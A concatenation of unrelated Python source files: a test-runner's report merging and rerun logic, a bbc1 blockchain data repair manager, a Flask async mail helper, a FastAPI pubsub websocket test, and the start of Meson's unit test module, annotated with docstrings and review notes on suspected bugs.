        if fail_count > 0:
            sys.exit(1)
    return results, xunit, "{0}{2}report-{1}".format(os.path.dirname(logs_folder), str_time, os.sep)
def filter_fields(testname):
    """Strip testrunner bookkeeping fields from a comma-separated test line.

    Handles both the old xml style (``key:value`` pairs, detected by a
    ``logs_folder:`` field, where the first ``:`` of each kept field is
    rewritten to ``=``) and the current ``key=value`` style.
    """
    # TODO: Fix for old xml style
    if "logs_folder:" in testname:
        dropped_prefixes = ("logs_folder", "conf_file", "cluster_name:",
                            "ini:", "case_number:", "num_nodes:", "spec:",
                            "last_case_fail:", "teardown_run:")
        words = testname.split(",")
        line = ""
        for word in words:
            if not word.startswith(dropped_prefixes):
                # Rewrite key:value to key=value, except quoted/query fields.
                if not "\":" in word or "query:" in word:
                    #log.info("Replacing : with ={}".format(word))
                    line = line + word.replace(":", "=", 1)
                else:
                    line = line + word
                if word != words[-1]:
                    line = line + ","
        return line
    else:
        dropped_prefixes = ("logs_folder=", "conf_file=", "cluster_name=",
                            "ini=", "case_number=", "num_nodes=", "spec=",
                            "last_case_fail=", "teardown_run=")
        kept = [word for word in testname.split(",")
                if not word.startswith(dropped_prefixes)]
        return ",".join(kept)
def compare_with_sort(dict, key):
    """Return True if ``dict`` has a key that is an anagram of ``key``
    (identical sorted character sequence).

    The parameter name ``dict`` shadows the builtin; kept for call-site
    compatibility.
    """
    canonical = "".join(sorted(key))
    return any("".join(sorted(existing)) == canonical
               for existing in list(dict.keys()))
def merge_reports(filespath):
    """Merge several xunit XML report files into one summary per testsuite.

    Args:
        filespath: either a list of glob patterns or a single
            comma-separated string of glob patterns for xunit XML files.

    Returns:
        dict: testsuite name -> {'name', 'errors', 'failures', 'skips',
        'time', 'testcount', 'tests': {filtered_name: testcase dict}}.

    Side effects: writes one merged report per testsuite under
    logs/testrunner-<timestamp>/merged_summary/ and logs a summary.
    """
    log.info("Merging of report files from "+str(filespath))
    testsuites = {}
    # Accept both a list of patterns and a comma-separated string.
    if not isinstance(filespath, list):
        filespaths = filespath.split(",")
    else:
        filespaths = filespath
    for filepath in filespaths:
        xml_files = glob.glob(filepath)
        # NOTE(review): str.find() returns -1 (truthy!) when "*" is absent,
        # so this condition is True unless "*" is the very first character.
        # Presumably `"*" in filespath` was intended — confirm before fixing.
        if not isinstance(filespath, list) and filespath.find("*"):
            xml_files.sort(key=os.path.getmtime)
        for xml_file in xml_files:
            log.info("-- " + xml_file + " --")
            doc = xml.dom.minidom.parse(xml_file)
            testsuitelem = doc.getElementsByTagName("testsuite")
            for ts in testsuitelem:
                tsname = ts.getAttribute("name")
                tserros = ts.getAttribute("errors")
                tsfailures = ts.getAttribute("failures")
                tsskips = ts.getAttribute("skips")
                tstime = ts.getAttribute("time")
                tstests = ts.getAttribute("tests")
                issuite_existed = False  # NOTE(review): assigned but never read
                tests = {}
                testsuite = {}
                # fill testsuite details: reuse an existing entry so tests
                # from several report files accumulate under one suite name
                if tsname in list(testsuites.keys()):
                    testsuite = testsuites[tsname]
                    tests = testsuite['tests']
                else:
                    testsuite['name'] = tsname
                    testsuite['errors'] = tserros
                    testsuite['failures'] = tsfailures
                    testsuite['skips'] = tsskips
                    testsuite['time'] = tstime
                    testsuite['testcount'] = tstests
                    issuite_existed = False
                testcaseelem = ts.getElementsByTagName("testcase")
                # fill test case details; a re-seen test keeps the time/error
                # of its first occurrence and only updates the display name
                for tc in testcaseelem:
                    testcase = {}
                    tcname = tc.getAttribute("name")
                    tctime = tc.getAttribute("time")
                    tcerror = tc.getElementsByTagName("error")
                    # match ignoring runner-internal params and param order
                    tcname_filtered = filter_fields(tcname)
                    if compare_with_sort(tests, tcname_filtered):
                        testcase = tests[tcname_filtered]
                        testcase['name'] = tcname
                    else:
                        testcase['name'] = tcname
                        testcase['time'] = tctime
                        testcase['error'] = ""
                        if tcerror:
                            testcase['error'] = str(tcerror[0].firstChild.nodeValue)
                    tests[tcname_filtered] = testcase
                testsuite['tests'] = tests
                testsuites[tsname] = testsuite
    log.info("\nNumber of TestSuites="+str(len(testsuites)))
    tsindex = 0
    for tskey in list(testsuites.keys()):
        tsindex = tsindex+1
        log.info("\nTestSuite#"+str(tsindex)+") "+str(tskey)+", Number of Tests="+str(len(testsuites[tskey]['tests'])))
        pass_count = 0
        fail_count = 0
        tests = testsuites[tskey]['tests']
        xunit = XUnitTestResult()
        for testname in list(tests.keys()):
            testcase = tests[testname]
            tname = testcase['name']
            ttime = testcase['time']
            inttime = float(ttime)
            terrors = testcase['error']
            tparams = ""
            # split "name,param1=...,..." into bare name and parameter string
            if "," in tname:
                tparams = tname[tname.find(","):]
                tname = tname[:tname.find(",")]
            if terrors:
                failed = True  # NOTE(review): assigned but never read
                fail_count = fail_count + 1
                xunit.add_test(name=tname, status='fail', time=inttime,
                               errorType='membase.error', errorMessage=str(terrors), params=tparams
                               )
            else:
                passed = True  # NOTE(review): assigned but never read
                pass_count = pass_count + 1
                xunit.add_test(name=tname, time=inttime, params=tparams
                               )
        str_time = time.strftime("%y-%b-%d_%H-%M-%S", time.localtime())
        abs_path = os.path.dirname(os.path.abspath(sys.argv[0]))
        root_log_dir = os.path.join(abs_path, "logs{0}testrunner-{1}".format(os.sep, str_time))
        if not os.path.exists(root_log_dir):
            os.makedirs(root_log_dir)
        logs_folder = os.path.join(root_log_dir, "merged_summary")
        try:
            os.mkdir(logs_folder)
        except:  # NOTE(review): bare except silently ignores any mkdir failure
            pass
        output_filepath="{0}{2}mergedreport-{1}".format(logs_folder, str_time, os.sep).strip()
        xunit.write(output_filepath)
        xunit.print_summary()
        # NOTE(review): tsname leaks from the parsing loop above, so this names
        # the *last parsed* suite, not tskey — looks wrong; confirm intent.
        log.info("Summary file is at " + output_filepath+"-"+tsname+".xml")
    return testsuites
def reruntests(rerun, names, options, arg_i, arg_p, runtime_test_params):
    """Run *names* once, then re-run the pass/fail subset up to N times.

    Args:
        rerun (str): "<type>=<count>" where <type> is "fail" or "pass" and
            <count> is the maximum number of reruns.
        names (list): test names to execute; replaced by the pass/fail
            subset after each run.
        options, arg_i, arg_p, runtime_test_params: forwarded to runtests().

    Returns:
        dict: run number -> results list, plus "<n>_report" -> report glob.

    Raises:
        ValueError: if *rerun* is not of the form "<type>=<count>".
    """
    if "=" not in rerun:
        # Bug fix: the old code only assigned rerun_type/rerun_count inside
        # `if "=" in rerun:` and then used them unconditionally, crashing
        # with a NameError on malformed input. Fail fast with a clear error.
        raise ValueError('rerun must be of the form "fail=<count>" or "pass=<count>", got %r' % (rerun,))
    reruns = rerun.split("=")
    rerun_type = reruns[0]
    rerun_count = int(reruns[1])
    all_results = {}
    log.info("NOTE: Running " + rerun_type + " tests for " + str(rerun_count) + " times maximum.")
    report_files = []
    for testc in range(rerun_count + 1):
        if testc == 0:
            log.info("\n*** FIRST run of the tests ***")
        else:
            log.info("\n*** " + rerun_type.upper() + " Tests Rerun#" + str(testc) + "/" + str(rerun_count) + " ***")
        results, xunit, report_file = runtests(names, options, arg_i, arg_p, runtime_test_params)
        all_results[(testc + 1)] = results
        all_results[str(testc + 1) + "_report"] = report_file + "*.xml"
        report_files.append(report_file + "*.xml")
        # Stop early when the last run produced no test of the rerun type.
        tobe_rerun = False
        for result in results:
            if result["result"] == rerun_type:
                tobe_rerun = True
        if not tobe_rerun:
            break
        # Narrow the test list to the passed/failed subset of the last run.
        tp, tf = parse_junit_result_xml(report_file + "*.xml")
        if "fail" == rerun_type:
            names = tf
        elif "pass" == rerun_type:
            names = tp
    log.info("\nSummary:\n" + str(all_results))
    log.info("Final result: merging...")
    merge_reports(report_files)
    return all_results
def main():
    """Entry point: parse arguments, build the global test input, dispatch.

    Depending on the command line this merges existing reports (--merge),
    reruns failed/passed tests (--rerun), or just runs the selected tests.
    """
    log.info("TestRunner: parsing args...")
    names, runtime_test_params, arg_i, arg_p, options = parse_args(sys.argv)
    log.info("TestRunner: start...")
    # get params from command line
    TestInputSingleton.input = TestInputParser.get_test_input(sys.argv)
    # ensure command line params get higher priority than the conf/ini files
    runtime_test_params.update(TestInputSingleton.input.test_params)
    TestInputSingleton.input.test_params = runtime_test_params
    log.info("Global Test input params:")
    pprint(TestInputSingleton.input.test_params)
    if names:
        if options.merge:
            merge_reports(options.merge)
        elif options.rerun:
            results = reruntests(options.rerun, names, options, arg_i, arg_p, runtime_test_params)
        else:
            results, _, _ = runtests(names, options, arg_i, arg_p,runtime_test_params)
    else:
        log.warning("Warning: No tests got selected. Please double check the .conf file and other "
                    "options!")
    log.info("TestRunner: end...")
def watcher():
    """Run main() in a child process/fork so ctrl-c works everywhere.

    This little code snippet is from
    http://greenteapress.com/semaphores/threading_cleanup.py (2012-07-31)
    It's now possible to interrupt the testrunner via ctrl-c at any time
    in a platform neutral way.
    """
    if sys.platform == 'win32':
        # Windows has no fork(); use a multiprocessing Process instead.
        p = Process(target=main, name="MainProcess")
        p.start()
        try:
            p.join()
            rc = p.exitcode
            if rc > 0:
                # propagate the child's failure exit code
                sys.exit(rc)
        except KeyboardInterrupt:
            log.error('KeyBoardInterrupt')
            p.terminate()
    else:
        child = os.fork()
        if child == 0:
            main() # child runs test
        # Parent waits for the child below. NOTE(review): after main()
        # returns, the *child* also falls through to this waitpid(0, ...)
        # call; having no children of its own it hits OSError and exits via
        # the final sys.exit() — confirm this is the intended exit path.
        try:
            rc = os.waitpid(child, 0)[1] //256 # exit status is the high order byte of second member of the tuple
            if rc > 0:
                sys.exit( rc )
        except KeyboardInterrupt:
            log.error('KeyBoardInterrupt')
            try:
                os.kill(child, signal.SIGKILL)
            except OSError:
                pass
        except OSError:
            pass
        sys.exit()
# Script entry point: delegate to watcher() so the test run can be
# interrupted with ctrl-c on any platform.
if __name__ == "__main__":
    watcher()
|
repair_manager.py | # -*- coding: utf-8 -*-
"""
Copyright (c) 2017 beyond-blockchain.org.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import json
import hashlib
import time
import threading
import queue
import os
import sys
sys.path.extend(["../../", os.path.abspath(os.path.dirname(__file__))])
from bbc1.core.data_handler import DataHandler
from bbc1.core.bbc_stats import BBcStats
from bbc1.core import bbclib
from bbc1.core.message_key_types import PayloadType, KeyType, InfraMessageCategory
from bbc1.core import logger
class RepairManager:
    """Data repair manager for forged transaction/asset data.

    A daemon thread consumes repair requests from an internal queue.  A
    forged transaction is first repaired from another local DB replica when
    one holds a valid copy; otherwise (and for asset files) a request is
    broadcast to the other core nodes of the domain and the first valid
    response is applied.  Each repair is appended as one JSON object per
    line to repair_log.json in the domain's working directory.
    """
    # Command codes carried in msg[KeyType.command]
    REQUEST_REPAIR_TRANSACTION = 0
    REQUEST_REPAIR_ASSET_FILE = 1
    REQUEST_TO_SEND_TRANSACTION_DATA = 2
    RESPONSE_TRANSACTION_DATA = 3
    REQUEST_TO_SEND_ASSET_FILE = 4
    RESPONSE_ASSET_FILE = 5

    def __init__(self, network=None, domain_id=None, workingdir=".", loglevel="all", logname=None):
        """
        Args:
            network: BBcNetwork instance.  NOTE(review): when None,
                self.network/self.core/self.data_handler are never assigned,
                so most methods would raise AttributeError — presumably only
                used this way in tests that touch stats/logging; confirm.
            domain_id (bytes): target domain identifier
            workingdir (str): base directory for the repair log
            loglevel: log level passed to the logger factory
            logname: log file name passed to the logger factory
        """
        if network is not None:
            self.network = network
            self.core = network.core
            self.stats = network.core.stats
            self.data_handler = network.domains[domain_id]['data']
        else:
            self.stats = BBcStats()
        self.repair_log = os.path.join(workingdir, domain_id.hex(), "repair_log.json")
        self.logger = logger.get_logger(key="repair_manager", level=loglevel, logname=logname)
        self.domain_id = domain_id
        self.queue = queue.Queue()
        # nonce -> metadata of an in-flight repair request (becomes the log record)
        self.requesting_list = dict()
        self.loop_flag = True
        # Daemon thread so it never blocks interpreter shutdown; it is also
        # stopped cleanly via exit_loop().
        th_nw_loop = threading.Thread(target=self._manager_loop)
        th_nw_loop.setDaemon(True)
        th_nw_loop.start()

    def _output_log(self, repair_info):
        """Append *repair_info* to the repair log as one JSON line."""
        with open(self.repair_log, "a") as f:
            f.write(json.dumps(repair_info)+"\n")

    def exit_loop(self):
        """Stop the manager loop (wakes the thread with a None message)."""
        self.loop_flag = False
        self.put_message()

    def _manager_loop(self):
        """Main loop: block on the queue and dispatch by command code."""
        while self.loop_flag:
            msg = self.queue.get()
            # None is only used to wake the loop (see exit_loop)
            if msg is None:
                continue
            if msg[KeyType.command] == RepairManager.REQUEST_REPAIR_TRANSACTION:
                self._repair_transaction_data(msg[KeyType.transaction_id])
            elif msg[KeyType.command] == RepairManager.REQUEST_REPAIR_ASSET_FILE:
                self._repair_asset_file(msg[KeyType.asset_group_id], msg[KeyType.asset_id])
            elif msg[KeyType.command] == RepairManager.REQUEST_TO_SEND_TRANSACTION_DATA:
                self._send_transaction_data(msg)
            elif msg[KeyType.command] == RepairManager.RESPONSE_TRANSACTION_DATA:
                self._receive_transaction_data_from_others(msg)
            elif msg[KeyType.command] == RepairManager.REQUEST_TO_SEND_ASSET_FILE:
                self._send_asset_file(msg)
            elif msg[KeyType.command] == RepairManager.RESPONSE_ASSET_FILE:
                self._receive_asset_file_from_others(msg)

    def put_message(self, msg=None):
        """Append a message (dict or None) to the manager queue."""
        self.queue.put(msg)

    def _repair_transaction_data(self, transaction_id):
        """Repair forged transaction_data or asset_file by getting legitimate one from other nodes

        First tries to restore from another local DB replica; when no replica
        holds a valid copy (or only one DB is configured), broadcasts a
        request to the other nodes in the domain.

        Args:
            transaction_id (bytes): target transaction_id
        """
        #print("_repair_transaction_data:")
        self.stats.update_stats_increment("transaction", "repair_request", 1)
        forged_asset_files = set()
        if len(self.data_handler.db_adaptors) > 1:
            valid_txobj = None
            db_nums_with_invalid_data = list()
            # scan the replica DBs (index 0 is the primary) for a valid copy
            for idx in range(1, len(self.data_handler.db_adaptors)):
                result_txobj, result_asset_files = self.data_handler.search_transaction(transaction_id=transaction_id, db_num=idx)
                # NOTE(review): result_txobj is indexed with [0] here but with
                # [transaction_id] in _send_transaction_data — verify which
                # keying search_transaction() actually returns.
                txobj_is_valid, valid_assets, invalid_assets = bbclib.validate_transaction_object(result_txobj[0],
                                                                                                 result_asset_files)
                if txobj_is_valid and valid_txobj is None:
                    valid_txobj = result_txobj[0]
                if not txobj_is_valid:
                    db_nums_with_invalid_data.append(idx)
                if len(invalid_assets) > 0:
                    for ent in invalid_assets:
                        forged_asset_files.add(ent)
            if valid_txobj is None:
                self.stats.update_stats_increment("transaction", "fail_to_repair_in_local", 1)
                self.logger.fatal("Failed to repair transaction locally (transaction_id=%s in domain=%s)" %
                                  (transaction_id.hex(), self.domain_id.hex()))
            else:
                # overwrite every replica that held an invalid copy
                for i in db_nums_with_invalid_data:
                    self.data_handler.restore_transaction_data(db_num=i, transaction_id=transaction_id, txobj=valid_txobj)
                self.stats.update_stats_increment("transaction", "success_repair", 1)
                self._output_log({"transaction_id": transaction_id.hex(), "request_at": int(time.time()),
                                  "repaired_by": "locally", "repaired_at": int(time.time())})
            # any asset found forged during validation is repaired separately
            if len(forged_asset_files) > 0:
                for asgid, ast in forged_asset_files:
                    self._repair_asset_file(asset_group_id=asgid, asset_id=ast, need_check=False)
            if self.data_handler.replication_strategy == DataHandler.REPLICATION_EXT:
                return
        # fall through to asking other nodes: pick a nonce not already in flight
        random_nonce = bbclib.get_random_value(4)
        while random_nonce in self.requesting_list:
            random_nonce = bbclib.get_random_value(4)
        self.requesting_list[random_nonce] = {
            "transaction_id": transaction_id.hex(),
            "request_at": int(time.time())
        }
        msg = {
            KeyType.domain_id: self.domain_id,
            KeyType.infra_msg_type: InfraMessageCategory.CATEGORY_DATA,
            KeyType.infra_command: DataHandler.REPAIR_TRANSACTION_DATA,
            KeyType.command: RepairManager.REQUEST_TO_SEND_TRANSACTION_DATA,
            KeyType.transaction_id: transaction_id,
            KeyType.nonce: random_nonce,
        }
        self.network.broadcast_message_in_network(domain_id=self.domain_id,
                                                  payload_type=PayloadType.Type_any, msg=msg)
        return

    def _repair_asset_file(self, asset_group_id, asset_id, need_check=True):
        """Repair forged asset_file by getting legitimate one from other nodes

        Args:
            asset_group_id (bytes): asset_group_id of the asset
            asset_id (bytes): asset_id of the asset
            need_check (bool): If True, check the digest of the asset file
                first and skip the repair when it is already valid
        """
        #print("_repair_asset_file:")
        # externally-stored assets are out of this manager's control
        if self.data_handler.use_external_storage:
            return
        if need_check:
            asset_file = self.data_handler.get_in_storage(asset_group_id, asset_id)
            # asset_id is defined as the SHA-256 digest of the file content
            if asset_file is not None and asset_id == hashlib.sha256(asset_file).digest():
                return
        # pick a nonce not already in flight
        random_nonce = bbclib.get_random_value(4)
        while random_nonce in self.requesting_list:
            random_nonce = bbclib.get_random_value(4)
        self.requesting_list[random_nonce] = {
            "asset_group_id": asset_group_id.hex(),
            "asset_id": asset_id.hex(),
            "request_at": int(time.time())
        }
        msg = {
            KeyType.domain_id: self.domain_id,
            KeyType.infra_msg_type: InfraMessageCategory.CATEGORY_DATA,
            # NOTE(review): reuses REPAIR_TRANSACTION_DATA as infra_command for
            # asset-file requests too — presumably the data handler routes on
            # KeyType.command; confirm this is intentional.
            KeyType.infra_command: DataHandler.REPAIR_TRANSACTION_DATA,
            KeyType.command: RepairManager.REQUEST_TO_SEND_ASSET_FILE,
            KeyType.asset_group_id: asset_group_id,
            KeyType.asset_id: asset_id,
            KeyType.nonce: random_nonce,
        }
        self.network.broadcast_message_in_network(domain_id=self.domain_id,
                                                  payload_type=PayloadType.Type_any, msg=msg)

    def _send_transaction_data(self, dat):
        """Send transaction data back to the requester if a valid copy exists.

        Args:
            dat (dict): received request message (reused as the response)
        """
        #print("_send_transaction_data::")
        transaction_id = dat[KeyType.transaction_id]
        for idx in range(len(self.data_handler.db_adaptors)):
            result_txobj, result_asset_files = self.data_handler.search_transaction(transaction_id=transaction_id, db_num=idx)
            txobj_is_valid, valid_assets, invalid_assets = bbclib.validate_transaction_object(result_txobj[transaction_id])
            if txobj_is_valid:
                dat[KeyType.command] = RepairManager.RESPONSE_TRANSACTION_DATA
                dat[KeyType.transaction_data] = bbclib.serialize(result_txobj[transaction_id])
                # reply directly to the node the request came from
                dat[KeyType.destination_node_id] = dat[KeyType.source_node_id]
                self.network.send_message_in_network(None, domain_id=self.domain_id, msg=dat)
                return

    def _receive_transaction_data_from_others(self, dat):
        """Receive transaction data from other core_nodes and check its validity

        Only responses matching an in-flight nonce are considered; a valid
        transaction is restored into every local DB replica and logged.

        Args:
            dat (dict): received message
        """
        #print("_receive_transaction_data_from_others:")
        if KeyType.transaction_data not in dat or KeyType.transaction_id not in dat or KeyType.nonce not in dat:
            return
        # ignore unsolicited or already-satisfied responses
        if dat[KeyType.nonce] not in self.requesting_list:
            return
        asset_files = dict()
        if KeyType.all_asset_files in dat:
            asset_files = dat[KeyType.all_asset_files]
        txobj, fmt_type = bbclib.deserialize(dat[KeyType.transaction_data])
        if txobj.transaction_data is None:
            return
        # never trust a remote copy without validating it first
        txobj_is_valid, valid_assets, invalid_assets = bbclib.validate_transaction_object(txobj, asset_files)
        if txobj_is_valid:
            self.stats.update_stats_increment("transaction", "success_repair", 1)
            for idx in range(len(self.data_handler.db_adaptors)):
                self.data_handler.restore_transaction_data(db_num=idx, transaction_id=txobj.transaction_id, txobj=txobj)
            add_info = {
                "repaired_by": dat[KeyType.source_node_id].hex(),
                "repaired_at": int(time.time())
            }
            self.requesting_list[dat[KeyType.nonce]].update(add_info)
            self._output_log(self.requesting_list[dat[KeyType.nonce]])
            # mark the request as satisfied
            del self.requesting_list[dat[KeyType.nonce]]

    def _send_asset_file(self, dat):
        """Send the asset file if having valid one

        Args:
            dat (dict): received request message (reused as the response)
        """
        #print("_send_asset_file::")
        asset_group_id = dat[KeyType.asset_group_id]
        asset_id = dat[KeyType.asset_id]
        asset_file = self.data_handler.get_in_storage(asset_group_id, asset_id)
        if asset_file is None:
            return
        result_txobj, result_asset_files = self.data_handler.search_transaction(asset_group_id=asset_group_id,
                                                                                asset_id=asset_id)
        txobj = next(iter(result_txobj.values()))
        # only answer when our own copy validates against the transaction
        txobj_is_valid, valid_assets, invalid_assets = bbclib.validate_transaction_object(txobj, result_asset_files)
        if (asset_group_id, asset_id) in valid_assets:
            dat[KeyType.command] = RepairManager.RESPONSE_ASSET_FILE
            dat[KeyType.asset_group_id] = asset_group_id
            dat[KeyType.asset_id] = asset_id
            dat[KeyType.asset_file] = asset_file
            dat[KeyType.destination_node_id] = dat[KeyType.source_node_id]
            self.network.send_message_in_network(None, domain_id=self.domain_id, msg=dat)

    def _receive_asset_file_from_others(self, dat):
        """Receive asset file from other core_nodes and check its validity

        A valid file (it must validate against the owning transaction) is
        stored with overwrite and the repair is logged.

        Args:
            dat (dict): received message
        """
        #print("_receive_asset_file_from_others:")
        if KeyType.nonce not in dat or dat[KeyType.nonce] not in self.requesting_list:
            return
        if KeyType.asset_group_id not in dat or KeyType.asset_id not in dat or KeyType.asset_file not in dat:
            return
        asset_group_id = dat[KeyType.asset_group_id]
        asset_id = dat[KeyType.asset_id]
        asset_file = dat[KeyType.asset_file]
        if asset_file is None:
            return
        asset_files = {asset_id: asset_file}
        result_txobj, result_asset_files = self.data_handler.search_transaction(asset_group_id=asset_group_id,
                                                                                asset_id=asset_id)
        txobj = next(iter(result_txobj.values()))
        # validate the received file against our own copy of the transaction
        txobj_is_valid, valid_assets, invalid_assets = bbclib.validate_transaction_object(txobj, asset_files)
        if (asset_group_id, asset_id) in valid_assets:
            self.data_handler.store_in_storage(asset_group_id, asset_id, asset_file, do_overwrite=True)
            add_info = {
                "repaired_by": dat[KeyType.source_node_id].hex(),
                "repaired_at": int(time.time())
            }
            self.requesting_list[dat[KeyType.nonce]].update(add_info)
            self._output_log(self.requesting_list[dat[KeyType.nonce]])
            # mark the request as satisfied
            del self.requesting_list[dat[KeyType.nonce]]
|
email.py | from flask import render_template,current_app
from flask_mail import Message
from app.extensions import mail
from threading import Thread
def async_send_mail(app, msg):
    """Send *msg* via Flask-Mail; intended to run in a worker thread.

    Args:
        app: the real Flask application object (not the request-local proxy).
        msg: a flask_mail.Message ready for delivery.
    """
    # Push the application context of the given app: mail.send() relies on
    # current_app, which only exists inside an app context.
    with app.app_context():
        mail.send(message=msg)
def send_mail(subject, to, tem, **kwargs):
    """Render an HTML email template and send it on a background thread.

    Args:
        subject: mail subject line.
        to: single recipient address.
        tem: template basename under templates/email/ (without ".html").
        **kwargs: context forwarded to the template.
    """
    # The worker thread needs the concrete app object, not the proxy.
    app = current_app._get_current_object()
    message = Message(subject=subject, recipients=[to], sender=app.config['MAIL_USERNAME'])
    message.html = render_template('email/' + tem + '.html', **kwargs)
    worker = Thread(target=async_send_mail, args=(app, message))
    worker.start()
|
server_subscriber_test.py | import os
import sys
from fastapi_websocket_rpc import logger
# Add parent path to use local src as package for tests
sys.path.append(os.path.abspath(os.path.join(os.path.dirname(__file__), os.path.pardir)))
import asyncio
from multiprocessing import Process
import requests
import pytest
import uvicorn
from fastapi import APIRouter, FastAPI
from fastapi_websocket_rpc.logger import get_logger
from fastapi_websocket_rpc.utils import gen_uid
from fastapi_websocket_pubsub import PubSubEndpoint, PubSubClient, Subscription, Topic
logger = get_logger("Test")
# Configurable
PORT = int(os.environ.get("PORT") or "7990")  # test server port (env override)
uri = f"ws://localhost:{PORT}/pubsub"  # websocket endpoint under test
trigger_url = f"http://localhost:{PORT}/trigger"  # REST route that fires the server event
DATA = "MAGIC"  # payload round-tripped through the pubsub chain
SERVER_TOPIC = "event/has-happened"  # topic the server publishes to itself
CLIENT_TOPIC = "event/has-been-processed"  # topic re-published for the client
def setup_server_rest_route(app, endpoint: PubSubEndpoint):
    """Attach a plain REST GET /trigger route that publishes SERVER_TOPIC."""
    @app.get("/trigger")
    async def trigger_events():
        logger.info("Triggered via HTTP route - publishing event")
        # Publish an event to our own server-side callback, which will in turn
        # trigger another event for the client.
        # Since we are calling back (RPC) to the client, this would deadlock
        # if we awaited it here - fire and forget instead.
        asyncio.create_task(endpoint.publish([SERVER_TOPIC], data=DATA))
        return "triggered"
def setup_server():
    """Build the FastAPI app with a PubSub endpoint and run it (blocking).

    Runs uvicorn on PORT; meant to be launched in a separate process by the
    `server` fixture.
    """
    app = FastAPI()
    # PubSub websocket endpoint
    endpoint = PubSubEndpoint()
    endpoint.register_route(app, "/pubsub")
    # receive an event and publish another (this time for the client)
    async def event_callback(subscription:Subscription, data):
        logger.info(f"Got topic {subscription.topic} - re-publishing as {CLIENT_TOPIC}")
        # fire-and-forget: awaiting the publish could deadlock the RPC channel
        asyncio.create_task(endpoint.publish([CLIENT_TOPIC], data))
    @app.on_event("startup")
    async def startup():
        # subscribe to our own events once the event loop is running
        await endpoint.subscribe([SERVER_TOPIC], event_callback)
    # Regular REST endpoint - that publishes to PubSub
    setup_server_rest_route(app, endpoint)
    uvicorn.run(app, port=PORT)
@pytest.fixture()
def server():
    """Pytest fixture: run the pubsub server in a separate (daemon) process
    for the duration of one test, then kill it."""
    # Run the server as a separate process
    proc = Process(target=setup_server, args=(), daemon=True)
    proc.start()
    yield proc
    proc.kill() # Cleanup after test
@pytest.mark.asyncio
async def test_server_subscribe_http_trigger(server):
    """End-to-end: HTTP /trigger -> server publishes SERVER_TOPIC ->
    server callback re-publishes CLIENT_TOPIC -> client receives DATA."""
    # finish trigger
    finish = asyncio.Event()
    # Create a client and subscribe to topics
    async with PubSubClient() as client:
        async def on_event(data, topic):
            # the payload must survive the whole publish/re-publish chain
            assert data == DATA
            finish.set()
        # subscribe for the event
        client.subscribe(CLIENT_TOPIC, on_event)
        # start listening
        client.start_client(uri)
        # wait for the client to be ready to receive events
        await client.wait_until_ready()
        # trigger the server via an HTTP route
        requests.get(trigger_url)
        # wait for finish trigger (5s timeout keeps a broken chain from hanging)
        await asyncio.wait_for(finish.wait(),5)
|
run_unittests.py | #!/usr/bin/env python3
# Copyright 2016-2021 The Meson development team
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import time
import stat
import subprocess
import re
import json
import tempfile
import textwrap
import os
import shutil
import sys
import unittest
import platform
import pickle
import functools
import io
import operator
import threading
import zipfile, tarfile
import hashlib
from itertools import chain
from unittest import mock
from configparser import ConfigParser
from contextlib import contextmanager
from glob import glob
from pathlib import (PurePath, Path)
from distutils.dir_util import copy_tree
import typing as T
import mesonbuild.mlog
import mesonbuild.depfile
import mesonbuild.dependencies.base
import mesonbuild.dependencies.factory
import mesonbuild.compilers
import mesonbuild.envconfig
import mesonbuild.environment
import mesonbuild.mesonlib
import mesonbuild.coredata
import mesonbuild.modules.gnome
from mesonbuild.interpreter import Interpreter
from mesonbuild.interpreterbase import typed_pos_args, InvalidArguments, ObjectHolder
from mesonbuild.interpreterbase import typed_pos_args, InvalidArguments, typed_kwargs, ContainerTypeInfo, KwargInfo
from mesonbuild.ast import AstInterpreter
from mesonbuild.mesonlib import (
BuildDirLock, LibType, MachineChoice, PerMachine, Version, is_windows,
is_osx, is_cygwin, is_dragonflybsd, is_openbsd, is_haiku, is_sunos,
windows_proof_rmtree, windows_proof_rm, python_command,
version_compare, split_args, quote_arg, relpath, is_linux, git
)
from mesonbuild.environment import detect_ninja
from mesonbuild.mesonlib import MesonException, EnvironmentException, OptionKey
from mesonbuild.dependencies import PkgConfigDependency
from mesonbuild.programs import ExternalProgram
import mesonbuild.dependencies.base
from mesonbuild.build import Target, ConfigurationData
import mesonbuild.modules.pkgconfig
from mesonbuild.scripts import destdir_join
from mesonbuild.mtest import TAPParser, TestResult
from mesonbuild.mesonmain import setup_vsenv
from mesonbuild.wrap.wrap import PackageDefinition, WrapException
from run_tests import (
Backend, FakeBuild, FakeCompilerOptions,
ensure_backend_detects_changes, exe_suffix, get_backend_commands,
get_builddir_target_args, get_fake_env, get_fake_options, get_meson_script,
run_configure_inprocess, run_mtest_inprocess
)
if T.TYPE_CHECKING:
from mesonbuild.compilers import Compiler
URLOPEN_TIMEOUT = 5
@contextmanager
def chdir(path: str):
    """Temporarily change the working directory to *path*.

    Restores the previous working directory on exit, even on exceptions.
    """
    previous = os.getcwd()
    os.chdir(path)
    try:
        yield
    finally:
        os.chdir(previous)
def get_dynamic_section_entry(fname: str, entry: str) -> T.Optional[str]:
    """Return the value of *entry* from the ELF dynamic section of *fname*,
    or None when the section has no such entry.  Skips the test on non-ELF
    platforms or when readelf is unavailable.
    """
    if is_cygwin() or is_osx():
        raise unittest.SkipTest('Test only applicable to ELF platforms')
    try:
        raw_out = subprocess.check_output(['readelf', '-d', fname],
                                          universal_newlines=True)
    except FileNotFoundError:
        # FIXME: Try using depfixer.py:Elf() as a fallback
        raise unittest.SkipTest('readelf not found')
    # '.' does not cross newlines, so searching the whole output is the same
    # as scanning line by line for the first match.
    found = re.search(entry + r': \[(.*?)\]', raw_out)
    if found is None:
        return None  # The file did not contain the specified entry.
    return str(found.group(1))
def get_soname(fname: str) -> T.Optional[str]:
    """Return the SONAME dynamic-section entry of *fname*, or None."""
    return get_dynamic_section_entry(fname, 'soname')
def get_rpath(fname: str) -> T.Optional[str]:
    """Return the rpath/runpath of *fname* with nix store entries removed,
    or None when there is no (remaining) rpath."""
